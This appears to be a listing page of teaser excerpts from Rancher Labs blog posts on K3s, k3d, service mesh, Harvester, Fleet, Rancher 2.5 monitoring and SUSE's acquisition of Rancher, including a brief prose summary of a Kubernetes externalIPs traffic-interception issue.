Have you ever wanted to try K3s high availability cluster “mode,” and you either did not have the minimum three “spare nodes” or the time required to set up the same amount of VMs? Then you are in for a good treat: meet k3d!
If you’re not familiar with k3d, its name gives you a hint to what it’s all about: K3s in Docker. k3d is a lightweight wrapper to run K3s (a lightweight, single <40MB binary, certified Kubernetes distribution developed by Rancher Labs and now a CNCF sandbox project) in Docker.
Service Mesh is an emerging architecture pattern gaining traction today. Along with Kubernetes, Service Mesh can form a powerful platform which addresses the technical requirements that arise in a highly distributed environment typically found on a microservices cluster and/or service infrastructure. A Service Mesh is a dedicated infrastructure layer for facilitating service-to-service communications between microservices.
Service Mesh addresses the communication requirements typical in a microservices-based application, including encrypted tunnels, health checks, circuit breakers, load balancing and traffic permission.
Earlier this month the Kubernetes project discovered a security issue affecting multitenant clusters: If a potential attacker can already create or edit services and pods, then they may be able to intercept traffic from other pods (or nodes) in the cluster.
An attacker that is able to create a ClusterIP service and set the spec.externalIPs field can intercept traffic to that IP. In the following image, a malicious party would be able to intercept traffic intended for Google’s public DNS server address ‘8.
Today, I am excited to announce project Harvester, open source hyperconverged infrastructure (HCI) software built using Kubernetes. Harvester provides fully integrated virtualization and storage capabilities on bare-metal servers. No Kubernetes knowledge is required to use Harvester.
Why Harvester? In the past few years, we’ve seen many attempts to bring VM management into container platforms, including our own RancherVM, and other solutions like KubeVirt and Virtlet. We’ve seen some demand for solutions like this, mostly for running legacy software side by side with containers.
As companies adopt container technologies, they face a significant challenge - how do we secure this new attack surface? It’s an issue that you often see backlogged in favor of solving storage, networking and monitoring issues. Add on the challenge of educating the workforce on one of the fastest-growing open source projects to date, and it’s no wonder security has lagged as the primary focus for teams. In fact, The New Stack published a survey that shows that almost 50 percent of Kubernetes users say security is their top unresolved issue.
Are you or your team currently looking for your next-generation architecture? Or perhaps are you already there, but looking for the best way to automate and manage it. In this blog, we’re going to talk about deploying Rancher environments using the power of env0.
Rancher: Kubernetes Management Platform Rancher is a complete software stack for teams adopting containers. It addresses the operational and security challenges of managing multiple Kubernetes clusters while providing DevOps teams with integrated tools for running containerized workloads.
With massive adoption of Kubernetes at enterprises worldwide, we are seeing Kubernetes going to new extremes. On the one hand, Kubernetes is being adopted for workloads at the edge and delivering value beyond the data center. On the other hand, Kubernetes is being used to drive Machine Learning (ML) and high-quality, high-speed data analysis capabilities. The activity we are seeing with ML results from developments in Kubernetes starting around v1.
Cloud-native is the ultimate buzzword lately. So, is “cloud-native storage” just an attempt to grab on to this concept, hoping for a little boost? Actually, there is something more to it, and I’ll unpack that here.
The premise of cloud-native storage is simple: its native habitat is a Kubernetes cluster. When we design with the assumption that a technology will exist in Kubernetes, we get to look around and see what functionalities already exist in that system.
In July, I announced SUSE's intent to acquire Rancher Labs, and now that the acquisition is final, today we embark on a new journey with SUSE. I couldn't be more excited about our future and what this means for our customers around the world.
Just as Rancher made computing everywhere a possibility for our customers, with SUSE, we will empower our customers to innovate everywhere. Together we will offer our customers possibilities that know no limitations from the data center to the cloud, to the edge and beyond.
Today Amazon announced Amazon EKS Distro (EKS-D), a Kubernetes distribution based on and used by Amazon EKS. Amazon EKS Distro enables you to create reliable and secure Kubernetes clusters using the same versions of Kubernetes and its dependencies deployed by Amazon EKS. Each Amazon EKS Distro release follows the EKS process, verifying new Kubernetes versions for compatibility. The Amazon EKS Distro source code, open source tooling, binaries and container images as well as configuration are provided for reproducible builds via public Git and S3 storage locations.
What’s Cool in Rancher 2.5? A Partner Perspective from SVA Since 2014, Rancher Labs has been making it easier for IT professionals to handle containers. Until now, every release of their flagship product, Rancher, brought features that you wouldn’t want to be without. But the latest releases have really taken things up a few notches.
In the 2.4 release, you could already see that something was about to happen. The number of manageable clusters and nodes had multiplied.
Today’s generation of makers, artists and creatives have reinforced the idea that great things can happen when you roll up your sleeves and try to learn something new and exciting. Kubernetes was like this only a couple of years ago: the mere act of installing the thing was a rewarding challenge. Kelsey Hightower’s Kubernetes the Hard Way became the Maker’s handbook for this artisan craft.
Fast forward to today and installing Kubernetes is no longer a noteworthy event.
If you’re like me and have been watching the odd purchasing trends due to the pandemic, you probably remember when all the hair clippers were sold out — and then flour and yeast. Most recently, you might have seen this headline: Tupperware profits and shares soar as more people are eating at home during the pandemic. Tupperware is finally having its day. But a Tupperware stacking strategy is probably not why you’re here.
We created the Fleet Project to provide centralized GitOps-style management of a large number of Kubernetes clusters. A key design goal of Fleet is to be able to manage 1 million geographically distributed clusters. When we architected Fleet, we wanted to use a standard Kubernetes controller architecture. This meant in order to scale, we needed to prove we could scale Kubernetes much farther than we ever had. In this blog, I will cover Fleet’s architecture, the method we used to test scale and our findings.
We dedicate a lot of space in our blog to the topic of monitoring. That’s because when you’re managing Kubernetes clusters, things can change quickly. It’s important that you have tools to monitor the health and resource metrics of your clusters.
In Rancher 2.5, we introduced a new version of our monitoring based on the Prometheus Operator, which provides Kubernetes-native deployment and management of Prometheus and related monitoring components. Prometheus operator lets you monitor the state and processes of your cluster nodes, Kubernetes components and application workloads.
Kubernetes is increasingly becoming a uniform standard for computing – in Edge, in core and in the cloud. At NTS, we recognize this trend and have been systematically building up competencies for this core technology since 2018. As a technically-oriented business, we regularly validate different Kubernetes platforms and we share the view of many analysts (e.g. Forrester or Gartner and Gartner Hype Cycle Reports) that Rancher Labs ranks among the leading players in this sector.
Introduction In this post, we will outline a reference architecture for setting up K3s in a High Availability (HA) configuration. This means that your K3s cluster can tolerate a failure and remain up and running and serving traffic to your users. Your applications should also be built and configured for high availability, but that is beyond the scope of this tutorial.
K3s is a lightweight certified Kubernetes distribution developed at Rancher Labs that built is for IoT and edge computing.
As Kubernetes continues to establish itself as the industry standard for container orchestration, finding effective ways to use a declarative model for your applications and tools is critical to success. In this blog, we’ll set up a K3s Kubernetes cluster in AWS, then implement secure GitOps using ArgoCD and Vault. Check out the source for the infrastructure and the Kubernetes umbrella application here.
Here are the components we’ll be using:
Rancher Labs has launched its much-anticipated Rancher version 2.5 into the cloud-native space, and we at LSD couldn't be more excited. Before highlighting some of the new features, here is some context as to how we think Rancher is innovating.
Kubernetes has become one of the most important technologies adopted by companies in their quest to modernize. While the container orchestrator, a fundamental piece of the cloud-native journey, has many advantages, it can also be frustratingly complex and challenging to architect, build, manage and maintain.
As a Senior Solutions Engineer helping customers deploy cloud-native technologies, I have been using Docker and Rancher for more than five years. Heck, I even helped steer Rancher for offline use when it was the 0.19 release. I have loved the product and company for YEARS.
We all know how complicated it is to set up Kubernetes, and customers love Rancher because it simplifies that rollout. But once you get the cluster running, a more significant challenge awaits: how do you ensure your Kubernetes applications are up to date and secure?